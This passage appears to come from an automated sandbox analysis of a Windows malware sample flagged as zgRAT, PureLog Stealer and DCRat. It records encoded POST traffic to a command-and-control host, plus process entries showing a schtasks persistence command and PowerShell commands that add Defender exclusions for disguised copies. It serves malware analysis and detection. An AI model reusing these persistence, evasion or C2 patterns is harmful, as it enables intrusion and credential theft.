                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:09.670263052 CET | 344 | OUT | Data Raw: 05 02 01 02 03 0a 04 01 05 06 02 01 02 07 01 03 00 01 05 0a 02 04 03 0e 07 04 0d 0c 03 0e 01 06 0d 01 04 5d 02 50 05 52 0b 0b 07 06 07 01 04 04 03 03 0f 00 0d 03 07 06 06 54 06 04 07 0a 05 58 05 07 0f 0d 00 04 07 51 0f 01 0f 02 0f 50 0f 04 07 53
                                                                                    Data Ascii: ]PRTXQPSRR\L}U~pbvbyMafkRhic|l~p|oRZY{NqXhmR@whOje~V@Ax}~O}ri
                                                                                    Dec 10, 2024 18:57:10.401350021 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:10.680888891 CET | 1027 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:10 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=auUHd77mNbIY1OFSqt2cPCeGF9%2BKIbFEsglIl2cnYKJ4pcvgaQtrCXw7UfVwo72QVPUkrsSEYBLD%2F%2FrwwEI6y4wALY0DPpOCZPmKpj3Qf6YPj7vQPXqtvglfPNYD23vZW883nk%2B0ow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1da30b1178d6-EWR
                                                                                    alt-svc: h2=":443"; ma=60
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3533&min_rtt=1781&rtt_var=4172&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=92422&cwnd=145&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    6 | 192.168.2.4 | 49767 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:57:17.463191032 CET | 337 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    7 | 192.168.2.4 | 49768 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:57:17.731216908 CET | 337 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:18.076374054 CET | 344 | OUT | Data Raw: 05 00 04 0d 06 0c 01 06 05 06 02 01 02 0d 01 05 00 07 05 09 02 03 03 0c 02 04 0d 53 06 53 00 05 0c 06 03 0f 00 00 05 52 0b 00 07 0b 00 05 07 51 06 0b 0b 08 0c 00 05 06 01 0f 04 07 06 0a 07 58 01 04 0e 0d 04 05 06 07 0c 07 0c 00 0f 57 0d 03 06 07
                                                                                    Data Ascii: SSRQXWYWW\L~kcy_vquwekUhlytBo\hMZxol_xszkmtcw`}e~V@{SfN~La
                                                                                    Dec 10, 2024 18:57:18.817718029 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:19.095565081 CET | 1030 | IN | HTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:18 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=vKnm5Aktim%2BkOGzhYTEDjQd417a%2FSLQ715r3CKgzplPfpzJUbXOV9sKuOpc%2F0z0DP8RM2uBgZzpePKm%2BpAmezsjTAsWnSEkw5ewZ5dTFkWpdS63IHoIN0lzzCQBZmYoopq2k4GtBnA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1dd7ac5942ef-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=4035&min_rtt=1586&rtt_var=5494&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=68919&cwnd=217&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                    8 | 192.168.2.4 | 49769 | 104.21.16.1 | 80
                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                    Dec 10, 2024 18:57:25.600408077 CET | 337 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                    Host: 188387cm.n9shteam.in
                                                                                    Content-Length: 344
                                                                                    Expect: 100-continue
                                                                                    Connection: Keep-Alive
                                                                                    Dec 10, 2024 18:57:25.951702118 CET344OUTData Raw: 05 01 01 07 06 0a 01 01 05 06 02 01 02 04 01 03 00 03 05 00 02 07 03 09 00 05 0a 07 07 0f 03 54 0c 0f 04 09 03 0d 06 55 0c 00 02 06 05 00 06 01 05 00 0d 00 0c 06 06 51 05 02 05 54 01 0a 06 58 00 50 0f 5e 05 00 04 53 0e 05 0b 06 0c 01 0e 05 07 57
                                                                                    Data Ascii: TUQTXP^SW\L}P|^z@cr}uKh|z\tRQX|c]_l|`YlNfh~`t^tju~V@@x}v}Lu
                                                                                    Dec 10, 2024 18:57:26.713639975 CET25INHTTP/1.1 100 Continue
                                                                                    Dec 10, 2024 18:57:26.975044966 CET1032INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 10 Dec 2024 17:57:26 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: keep-alive
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AagREarZeZlWCORPNbVh%2FdF17qqYnei67zS%2FF4igQ5vA%2FqoDn7PPZlhwi6RgY3%2FIKSE1OCvVxltPQI5aEFDXFqhnV0uMbXwboVuHtFd1%2FMgSWtcKBtWkLLlOoXzS1yW0s1LeJHZ3nA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8eff1e08fc194356-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    server-timing: cfL4;desc="?proto=TCP&rtt=3514&min_rtt=1702&rtt_var=4263&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=681&delivery_rate=90112&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                    Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                    Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>0


Session ID: 9
Source IP: 192.168.2.4
Source Port: 49770
Destination IP: 104.21.16.1
Destination Port: 80

Timestamp | Bytes transferred | Direction | Data
Dec 10, 2024 18:57:33.679338932 CET | 301 | OUT | POST /videolinePipeHttplowProcessorgamelocalTemp.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
Host: 188387cm.n9shteam.in
Content-Length: 344
Expect: 100-continue
Connection: Keep-Alive
Dec 10, 2024 18:57:34.029541016 CET | 344 | OUT | Data Raw: 05 05 04 01 03 0b 04 00 05 06 02 01 02 0d 01 06 00 03 05 08 02 04 03 0c 02 0e 0f 02 04 04 02 09 0c 02 04 01 02 06 05 52 0e 07 06 0b 07 06 04 01 03 00 0c 0f 0d 05 04 0b 01 06 06 51 07 04 05 00 01 04 0a 0c 07 55 05 07 0e 01 0c 55 0a 04 0d 04 04 0d
Data Ascii: RQUURV\L~|Yb`bawvt~lWclUYkc`l{Kx`b}{Q`Yxie~V@{mvA}ra
Dec 10, 2024 18:57:34.764107943 CET | 25 | IN | HTTP/1.1 100 Continue
Dec 10, 2024 18:57:35.016144991 CET | 1025 | IN | HTTP/1.1 404 Not Found
Date: Tue, 10 Dec 2024 17:57:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=znrVN6YZReAP%2Fw3qnpZB1toKNEgQDb0oUF0soQre702DRXxtokfpRrq94DMxyXnseRSM4Ze7EY7FLUg%2BHwPHCyO1X%2BqK6b9hVq1aM2H8aq27OMDeRPbT%2FP8%2FP9M2eUB9pHU5BCRplA%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8eff1e3b4aef0f41-EWR
alt-svc: h2=":443"; ma=60
server-timing: cfL4;desc="?proto=TCP&rtt=3022&min_rtt=1630&rtt_var=3395&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=645&delivery_rate=114366&cwnd=144&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Raw: 64 35 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 0d 0a 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: d5<html><head><meta http-equiv="content-type" content="text/html; charset=UTF-8"><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Dec 10, 2024 18:57:35.207669973 CET | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


                                                                                    Target ID:0
                                                                                    Start time:12:54:55
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Desktop\JNKHlxGvw4.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Users\user\Desktop\JNKHlxGvw4.exe"
                                                                                    Imagebase:0x1b0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Yara matches:
                                                                                    • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1865882915.000000001AD80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1861105197.0000000012615000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    • Rule: JoeSecurity_DCRat_1, Description: Yara detected DCRat, Source: 00000000.00000002.1861105197.00000000128AD000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:5
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\eaiouozr\eaiouozr.cmdline"
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:2'759'232 bytes
                                                                                    MD5 hash:F65B029562077B648A6A5F6A1AA76A66
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:moderate
                                                                                    Has exited:true

                                                                                    Target ID:6
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:7
                                                                                    Start time:12:55:05
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5227.tmp" "c:\Windows\System32\CSC33CD08692B74926AEFF4FCBC6A080B2.TMP"
                                                                                    Imagebase:0x7ff71ce70000
                                                                                    File size:52'744 bytes
                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:16
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\schtasks.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:schtasks.exe /create /tn "lsassl" /sc MINUTE /mo 13 /tr "'C:\Users\user\Favorites\lsass.exe'" /rl HIGHEST /f
                                                                                    Imagebase:0x7ff76f990000
                                                                                    File size:235'008 bytes
                                                                                    MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:17
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Favorites\lsass.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Favorites\lsass.exe
                                                                                    Imagebase:0xc40000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:19
                                                                                    Start time:12:55:06
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Users\user\Favorites\lsass.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Users\user\Favorites\lsass.exe
                                                                                    Imagebase:0x2b0000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:22
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0x790000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:23
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Program Files (x86)\Windows Photo Viewer\en-GB\RuntimeBroker.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe"
                                                                                    Imagebase:0xa10000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:26
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\USZqVcJFLA.exe
                                                                                    Imagebase:0x860000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Antivirus matches:
                                                                                    • Detection: 100%, Avira
                                                                                    • Detection: 100%, Joe Sandbox ML
                                                                                    • Detection: 79%, ReversingLabs
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:28
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Recovery\USZqVcJFLA.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Recovery\USZqVcJFLA.exe
                                                                                    Imagebase:0x50000
                                                                                    File size:1'560'958 bytes
                                                                                    MD5 hash:6689BD9A5C795EEDC631E5FBB850B7FF
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:low
                                                                                    Has exited:true

                                                                                    Target ID:29
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows photo viewer\en-GB\RuntimeBroker.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:30
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:true

                                                                                    Target ID:31
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Reputation:high
                                                                                    Has exited:false

                                                                                    Target ID:32
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\USZqVcJFLA.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:33
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:34
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Favorites\lsass.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:35
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:36
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Multimedia Platform\SystemSettings.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:37
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:"powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\JNKHlxGvw4.exe'
                                                                                    Imagebase:0x7ff788560000
                                                                                    File size:452'608 bytes
                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:true

                                                                                    Target ID:38
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                    Wow64 process (32bit):false
                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                    Imagebase:0x7ff7699e0000
                                                                                    File size:862'208 bytes
                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                    Has elevated privileges:true
                                                                                    Has administrator privileges:true
                                                                                    Programmed in:C, C++ or other language
                                                                                    Has exited:false

                                                                                    Target ID:39
                                                                                    Start time:12:55:07
                                                                                    Start date:10/12/2024
                                                                                    Path:C:\Windows\System32\conhost.exe
